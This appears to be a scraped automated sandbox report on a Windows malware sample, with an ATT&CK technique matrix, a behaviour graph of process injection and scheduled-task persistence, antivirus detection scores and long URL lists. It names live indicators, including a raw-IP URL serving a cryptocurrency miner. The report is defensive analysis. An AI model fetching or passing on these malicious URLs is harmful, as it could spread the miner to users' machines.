Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeQueries volume information: C:\Users\user\AppData\Local\ServiceHub\ngentask.exe VolumeInformation
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeQueries volume information: C:\Users\user\AppData\Local\ServiceHub\ngentask.exe VolumeInformation
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_00409664 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1
Command and Scripting Interpreter
11
Scheduled Task/Job
311
Process Injection
1
Masquerading
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
Exfiltration Over Other Network Medium11
Encrypted Channel
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts11
Scheduled Task/Job
1
DLL Side-Loading
11
Scheduled Task/Job
1
Disable or Modify Tools
LSASS Memory2
Security Software Discovery
Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth3
Ingress Tool Transfer
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts2
Native API
Logon Script (Windows)1
DLL Side-Loading
31
Virtualization/Sandbox Evasion
Security Account Manager1
Process Discovery
SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
Non-Application Layer Protocol
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)311
Process Injection
NTDS31
Virtualization/Sandbox Evasion
Distributed Component Object ModelInput CaptureScheduled Transfer14
Application Layer Protocol
SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
Obfuscated Files or Information
LSA Secrets11
Remote System Discovery
SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common3
Software Packing
Cached Domain Credentials1
System Network Configuration Discovery
VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup Items1
DLL Side-Loading
DCSync1
File and Directory Discovery
Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem14
System Information Discovery
Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 749056 Sample: QHSgso4hXH.exe Startdate: 18/11/2022 Architecture: WINDOWS Score: 88 52 Antivirus detection for URL or domain 2->52 54 Multi AV Scanner detection for submitted file 2->54 56 Sigma detected: Schedule binary from dotnet directory 2->56 58 Machine Learning detection for sample 2->58 9 QHSgso4hXH.exe 13 2->9         started        13 ngentask.exe 1 2->13         started        15 ngentask.exe 1 2->15         started        17 ngentask.exe 1 2->17         started        process3 dnsIp4 44 imarket-eg.com 160.153.50.70, 443, 49702 AS-26496-GO-DADDY-COM-LLCUS United States 9->44 46 www.imarket-eg.com 9->46 48 vxsljuxgekdpuv.307xvytdn0 9->48 60 Writes to foreign memory regions 9->60 62 Allocates memory in foreign processes 9->62 64 Injects a PE file into a foreign processes 9->64 19 ngentask.exe 4 9->19         started        22 conhost.exe 13->22         started        24 conhost.exe 15->24         started        26 conhost.exe 17->26         started        signatures5 process6 file7 42 C:\Users\user\AppData\Local\...\ngentask.exe, PE32 19->42 dropped 28 cmd.exe 1 19->28         started        process8 signatures9 66 Uses schtasks.exe or at.exe to add and modify task schedules 28->66 68 Uses ping.exe to check the status of other devices and networks 28->68 31 PING.EXE 1 28->31         started        34 ngentask.exe 2 28->34         started        36 conhost.exe 28->36         started        38 2 other processes 28->38 process10 dnsIp11 50 127.0.0.1 unknown unknown 31->50 40 conhost.exe 34->40         started        process12

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
QHSgso4hXH.exe32%ReversingLabs
QHSgso4hXH.exe34%VirustotalBrowse
QHSgso4hXH.exe100%Joe Sandbox ML
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\ServiceHub\ngentask.exe0%ReversingLabs
C:\Users\user\AppData\Local\ServiceHub\ngentask.exe0%MetadefenderBrowse
SourceDetectionScannerLabelLinkDownload
0.3.QHSgso4hXH.exe.c190000.0.unpack100%AviraTR/ATRAPS.GenDownload File
1.0.ngentask.exe.400000.0.unpack100%AviraTR/ATRAPS.GenDownload File
0.3.QHSgso4hXH.exe.c190000.1.unpack100%AviraTR/ATRAPS.GenDownload File
No Antivirus matches
SourceDetectionScannerLabelLink
http://vXsLjUXgEkdPUv.307xVYtdN00%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/includes/ext/sina/assets/js/m0%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-json/0%Avira URL Cloudsafe
https://www.imarket-eg.com/0%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/plugins/elementor-pro/assets/css/frontend.min.css?ver=3.3.00%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/css/de-sticky-frontend0%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/includes/ext/sina/assets/js/a0%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/themes/hello-elementor/theme.min.css?ver=2.3.10%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.cs0%Avira URL Cloudsafe
https://www.imarket-eg.com/videography/0%Avira URL Cloudsafe
https://www.imarket-eg.com/contact-us/#0%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/includes/ext/sina/assets/js/s0%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/includes/ext/sina/assets/js/l0%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.eot?5.10.0);s0%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver0%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.4.80%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/includes/ext/sina/assets/js/d0%Avira URL Cloudsafe
https://analytify.io/downloads/analytify-wordpress-plugin/0%Avira URL Cloudsafe
https://www.imarket-eg.com/comments/feed/0%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/uploads/2021/06/cropped-I-270x270.jpg0%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/plugins/elementor-pro/assets/lib/sticky/jquery.sticky.min.js?v0%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/includes/ext/sina/assets/js/i0%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/de-active-icon-box.0%Avira URL Cloudsafe
http://193.218.201.246/xmrig.exe100%Avira URL Cloudmalware
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.0%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/css/simple-line-icons.0%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/uploads/2021/06/Logo-e1624927275244-300x96.png0%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/uploads/elementor/css/post-164.css?ver=16375790400%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/css/slick.css?ver=1.5.0%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/jquery-1.12.4-wp.js0%Avira URL Cloudsafe
https://www.imarket-eg.com/google-ads/0%Avira URL Cloudsafe
https://www.imarket-eg.com/web-design/0%Avira URL Cloudsafe
https://www.imarket-eg.com/library.bin0%Avira URL Cloudsafe
https://www.imarket-eg.com/branding/0%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-includes/css/dist/block-library/style.min.css?ver=6.0.30%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.4.80%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/de-sticky-frontend.0%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/jquery-migrate-1.4.0%Avira URL Cloudsafe
https://www.imarket-eg.com/web-design-2/0%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/js/preloaded-modules.min.js?ver=3.4.80%Avira URL Cloudsafe
http://193.218.201.246/xmrig.exe(KKl0%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/de_loop/ecs.js?ver=0%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/plugins/elementor-pro/assets/js/webpack-pro.runtime.min.js?ver0%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/share-link/share-link.min.js?ver=0%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/plugins/chaty/css/chaty-front.min.css?ver=16303262430%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/lib/ResizeSensor.mi0%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/css/dethemekit-de-caro0%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/themes/hello-elementor/style.min.css?ver=2.3.10%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/uploads/2021/06/cropped-I-180x180.jpg0%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js?ver=4.0%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/plugins/elementor-pro/assets/js/frontend.min.js?ver=3.3.00%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff?5.10.0)0%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/uploads/2021/06/Logo-e1624927275244.png0%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/lib/sticky-sidebar/0%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/plugins/elementor-pro/assets/js/preloaded-elements-handlers.mi0%Avira URL Cloudsafe
http://vXsLjUXgEkdPUv.307xVYtdN0h8WhldS19UlhMR80~0%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/font-awesome.min0%Avira URL Cloudsafe
https://www.imarket-eg.com/elementor-524/0%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/css/de_loop/ecs-style.0%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/uploads/2021/06/cropped-I-192x192.jpg0%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.4.80%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.4.80%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/uploads/elementor/css/post-171.css?ver=16375790400%Avira URL Cloudsafe
https://www.imarket-eg.com/designs/0%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/uploads/2021/06/cropped-I-32x32.jpg0%Avira URL Cloudsafe
https://www.imarket-eg.com/business-consulting/0%Avira URL Cloudsafe
https://www.imarket-eg.com/contact-us/0%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/swiper/swiper.min.js?ver=5.3.60%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/css/dethemekit-widgets0%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/includes/ext/sina/assets/css/0%Avira URL Cloudsafe
https://www.imarket-eg.com/search-user-optimization/0%Avira URL Cloudsafe
https://www.imarket-eg.com/feed/0%Avira URL Cloudsafe
https://www.imarket-eg.com/social-media/0%Avira URL Cloudsafe
https://www.imarket-eg.com/library.bini3NC8vtbKWLvXsWnllFS6z1xMD07Gw9nfzJIj6wDIzGzCefljal5yvndAtCkYM0%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-includes/js/jquery/ui/core.min.js?ver=1.13.10%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css?ve0%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/uploads/elementor/css/post-196.css?ver=16375795830%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/lib/jsticky/jquery.0%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/dialog/dialog.min.js?ver=4.8.10%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/plugins/elementor-pro/assets/lib/smartmenus/jquery.smartmenus.0%Avira URL Cloudsafe
https://www.imarket-eg.com/about-imarket/0%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/plugins/wp-rocket/assets/js/lazyload/17.5/lazyload.min.js0%Avira URL Cloudsafe
https://www.imarket-eg.com/xmlrpc.php?rsd0%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.ttf?5.10.0)0%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/css/htflexboxgrid.css?0%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/plugins/chaty/js/cht-front-script.js?ver=16303262430%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.svg?5.10.0#ei0%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-includes/wlwmanifest.xml0%Avira URL Cloudsafe
https://www.imarket-eg.com/social-media-marketing/0%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/css/de-product-display0%Avira URL Cloudsafe
https://www.imarket-eg.com0%Avira URL Cloudsafe
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/de_loop/ecs_ajax_pa0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
imarket-eg.com
160.153.50.70
truefalse
    unknown
    vxsljuxgekdpuv.307xvytdn0
    unknown
    unknownfalse
      unknown
      www.imarket-eg.com
      unknown
      unknownfalse
        unknown
        NameMaliciousAntivirus DetectionReputation
        https://www.imarket-eg.com/library.binfalse
        • Avira URL Cloud: safe
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        https://www.imarket-eg.com/advapi32.dll.0.drfalse
        • Avira URL Cloud: safe
        unknown
        https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.csadvapi32.dll.0.drfalse
        • Avira URL Cloud: safe
        unknown
        https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/includes/ext/sina/assets/js/aadvapi32.dll.0.drfalse
        • Avira URL Cloud: safe
        unknown
        https://www.imarket-eg.com/videography/advapi32.dll.0.drfalse
        • Avira URL Cloud: safe
        unknown
        https://www.imarket-eg.com/wp-content/themes/hello-elementor/theme.min.css?ver=2.3.1advapi32.dll.0.drfalse
        • Avira URL Cloud: safe
        unknown
        https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/css/de-sticky-frontendadvapi32.dll.0.drfalse
        • Avira URL Cloud: safe
        unknown
        https://www.imarket-eg.com/contact-us/#advapi32.dll.0.drfalse
        • Avira URL Cloud: safe
        unknown
        https://www.imarket-eg.com/wp-json/advapi32.dll.0.drfalse
        • Avira URL Cloud: safe
        unknown
        http://vXsLjUXgEkdPUv.307xVYtdN0QHSgso4hXH.exefalse
        • Avira URL Cloud: safe
        low
        https://www.imarket-eg.com/wp-content/plugins/elementor-pro/assets/css/frontend.min.css?ver=3.3.0advapi32.dll.0.drfalse
        • Avira URL Cloud: safe
        unknown
        https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/includes/ext/sina/assets/js/madvapi32.dll.0.drfalse
        • Avira URL Cloud: safe
        unknown
        https://analytify.io/downloads/analytify-wordpress-plugin/advapi32.dll.0.drfalse
        • Avira URL Cloud: safe
        unknown
        https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/includes/ext/sina/assets/js/ladvapi32.dll.0.drfalse
        • Avira URL Cloud: safe
        unknown
        https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/includes/ext/sina/assets/js/sadvapi32.dll.0.drfalse
        • Avira URL Cloud: safe
        unknown
        https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.eot?5.10.0);sadvapi32.dll.0.drfalse
        • Avira URL Cloud: safe
        unknown
        https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/includes/ext/sina/assets/js/dadvapi32.dll.0.drfalse
        • Avira URL Cloud: safe
        unknown
        https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?veradvapi32.dll.0.drfalse
        • Avira URL Cloud: safe
        unknown
        https://www.imarket-eg.com/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.4.8advapi32.dll.0.drfalse
        • Avira URL Cloud: safe
        unknown
        https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/includes/ext/sina/assets/js/iadvapi32.dll.0.drfalse
        • Avira URL Cloud: safe
        unknown
        https://www.imarket-eg.com/wp-content/uploads/2021/06/cropped-I-270x270.jpgadvapi32.dll.0.drfalse
        • Avira URL Cloud: safe
        unknown
        https://www.imarket-eg.com/comments/feed/advapi32.dll.0.drfalse
        • Avira URL Cloud: safe
        unknown
        https://www.imarket-eg.com/wp-content/plugins/elementor-pro/assets/lib/sticky/jquery.sticky.min.js?vadvapi32.dll.0.drfalse
        • Avira URL Cloud: safe
        unknown
        https://connect.facebook.net/en_US/fbevents.jsadvapi32.dll.0.drfalse
          high
          https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/jquery-1.12.4-wp.jsadvapi32.dll.0.drfalse
          • Avira URL Cloud: safe
          unknown
          https://twitter.com/imarketegyptadvapi32.dll.0.drfalse
            high
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namengentask.exe, 00000001.00000002.275257695.0000000002F91000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/css/slick.css?ver=1.5.advapi32.dll.0.drfalse
              • Avira URL Cloud: safe
              unknown
              https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/css/simple-line-icons.advapi32.dll.0.drfalse
              • Avira URL Cloud: safe
              unknown
              https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/de-active-icon-box.advapi32.dll.0.drfalse
              • Avira URL Cloud: safe
              unknown
              https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.advapi32.dll.0.drfalse
              • Avira URL Cloud: safe
              unknown
              https://www.imarket-eg.com/wp-content/uploads/2021/06/Logo-e1624927275244-300x96.pngadvapi32.dll.0.drfalse
              • Avira URL Cloud: safe
              unknown
              https://www.imarket-eg.com/wp-content/uploads/elementor/css/post-164.css?ver=1637579040advapi32.dll.0.drfalse
              • Avira URL Cloud: safe
              unknown
              http://193.218.201.246/xmrig.exengentask.exe, 00000001.00000002.275257695.0000000002F91000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              unknown
              https://www.youtube.com/channel/UCoLhJ3CIgGI8Rvq_S_TkcFgadvapi32.dll.0.drfalse
                high
                https://www.imarket-eg.com/google-ads/advapi32.dll.0.drfalse
                • Avira URL Cloud: safe
                unknown
                https://www.imarket-eg.com/web-design/advapi32.dll.0.drfalse
                • Avira URL Cloud: safe
                unknown
                https://www.imarket-eg.com/wp-includes/css/dist/block-library/style.min.css?ver=6.0.3advapi32.dll.0.drfalse
                • Avira URL Cloud: safe
                unknown
                https://www.imarket-eg.com/branding/advapi32.dll.0.drfalse
                • Avira URL Cloud: safe
                unknown
                https://www.imarket-eg.com/wp-content/plugins/elementor/assets/js/preloaded-modules.min.js?ver=3.4.8advapi32.dll.0.drfalse
                • Avira URL Cloud: safe
                unknown
                https://www.imarket-eg.com/web-design-2/advapi32.dll.0.drfalse
                • Avira URL Cloud: safe
                unknown
                https://www.imarket-eg.com/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.4.8advapi32.dll.0.drfalse
                • Avira URL Cloud: safe
                unknown
                https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/de-sticky-frontend.advapi32.dll.0.drfalse
                • Avira URL Cloud: safe
                unknown
                https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/jquery-migrate-1.4.advapi32.dll.0.drfalse
                • Avira URL Cloud: safe
                unknown
                http://193.218.201.246/xmrig.exe(KKlngentask.exe, 00000001.00000002.275257695.0000000002F91000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://www.imarket-eg.com/wp-content/plugins/chaty/css/chaty-front.min.css?ver=1630326243advapi32.dll.0.drfalse
                • Avira URL Cloud: safe
                unknown
                https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/de_loop/ecs.js?ver=advapi32.dll.0.drfalse
                • Avira URL Cloud: safe
                unknown
                https://www.imarket-eg.com/wp-content/plugins/elementor-pro/assets/js/webpack-pro.runtime.min.js?veradvapi32.dll.0.drfalse
                • Avira URL Cloud: safe
                unknown
                https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/share-link/share-link.min.js?ver=advapi32.dll.0.drfalse
                • Avira URL Cloud: safe
                unknown
                https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/css/dethemekit-de-caroadvapi32.dll.0.drfalse
                • Avira URL Cloud: safe
                unknown
                https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/lib/ResizeSensor.miadvapi32.dll.0.drfalse
                • Avira URL Cloud: safe
                unknown
                https://www.imarket-eg.com/wp-content/themes/hello-elementor/style.min.css?ver=2.3.1advapi32.dll.0.drfalse
                • Avira URL Cloud: safe
                unknown
                https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js?ver=4.advapi32.dll.0.drfalse
                • Avira URL Cloud: safe
                unknown
                https://www.imarket-eg.com/wp-content/uploads/2021/06/cropped-I-180x180.jpgadvapi32.dll.0.drfalse
                • Avira URL Cloud: safe
                unknown
                https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/lib/sticky-sidebar/advapi32.dll.0.drfalse
                • Avira URL Cloud: safe
                unknown
                https://www.imarket-eg.com/wp-content/uploads/2021/06/Logo-e1624927275244.pngadvapi32.dll.0.drfalse
                • Avira URL Cloud: safe
                unknown
                https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff?5.10.0)advapi32.dll.0.drfalse
                • Avira URL Cloud: safe
                unknown
                https://gmpg.org/xfn/11advapi32.dll.0.drfalse
                  high
                  https://www.imarket-eg.com/wp-content/plugins/elementor-pro/assets/js/frontend.min.js?ver=3.3.0advapi32.dll.0.drfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.imarket-eg.com/wp-content/plugins/elementor-pro/assets/js/preloaded-elements-handlers.miadvapi32.dll.0.drfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.imarket-eg.com/elementor-524/advapi32.dll.0.drfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://vXsLjUXgEkdPUv.307xVYtdN0h8WhldS19UlhMR80~QHSgso4hXH.exe, 00000000.00000002.520178129.0000000002A1B000.00000040.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  low
                  https://instagram.com/imarketegypt?utm_medium=copy_linkadvapi32.dll.0.drfalse
                    high
                    https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/css/de_loop/ecs-style.advapi32.dll.0.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/font-awesome.minadvapi32.dll.0.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.imarket-eg.com/wp-content/uploads/2021/06/cropped-I-192x192.jpgadvapi32.dll.0.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.imarket-eg.com/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.4.8advapi32.dll.0.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.imarket-eg.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.4.8advapi32.dll.0.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.imarket-eg.com/business-consulting/advapi32.dll.0.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.imarket-eg.com/wp-content/uploads/2021/06/cropped-I-32x32.jpgadvapi32.dll.0.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.imarket-eg.com/wp-content/uploads/elementor/css/post-171.css?ver=1637579040advapi32.dll.0.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/swiper/swiper.min.js?ver=5.3.6advapi32.dll.0.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.imarket-eg.com/designs/advapi32.dll.0.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/includes/ext/sina/assets/css/advapi32.dll.0.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.imarket-eg.com/feed/advapi32.dll.0.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/css/dethemekit-widgetsadvapi32.dll.0.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.linkedin.com/in/imarket-marketing-agency-a80a82213/advapi32.dll.0.drfalse
                      high
                      https://www.imarket-eg.com/contact-us/advapi32.dll.0.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.imarket-eg.com/search-user-optimization/advapi32.dll.0.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.imarket-eg.com/social-media/advapi32.dll.0.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.imarket-eg.com/library.bini3NC8vtbKWLvXsWnllFS6z1xMD07Gw9nfzJIj6wDIzGzCefljal5yvndAtCkYMQHSgso4hXH.exe, 00000000.00000002.520178129.0000000002A1B000.00000040.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css?veadvapi32.dll.0.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.imarket-eg.com/wp-includes/js/jquery/ui/core.min.js?ver=1.13.1advapi32.dll.0.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://api.w.org/advapi32.dll.0.drfalse
                        high
                        https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/lib/jsticky/jquery.advapi32.dll.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.imarket-eg.com/wp-content/uploads/elementor/css/post-196.css?ver=1637579583advapi32.dll.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/dialog/dialog.min.js?ver=4.8.1advapi32.dll.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.imarket-eg.com/about-imarket/advapi32.dll.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.imarket-eg.com/wp-content/plugins/elementor-pro/assets/lib/smartmenus/jquery.smartmenus.advapi32.dll.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.imarket-eg.com/wp-content/plugins/wp-rocket/assets/js/lazyload/17.5/lazyload.min.jsadvapi32.dll.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.ttf?5.10.0)advapi32.dll.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.imarket-eg.com/social-media-marketing/advapi32.dll.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.imarket-eg.com/wp-includes/wlwmanifest.xmladvapi32.dll.0.drfalse
                        • Avira URL Cloud: safe
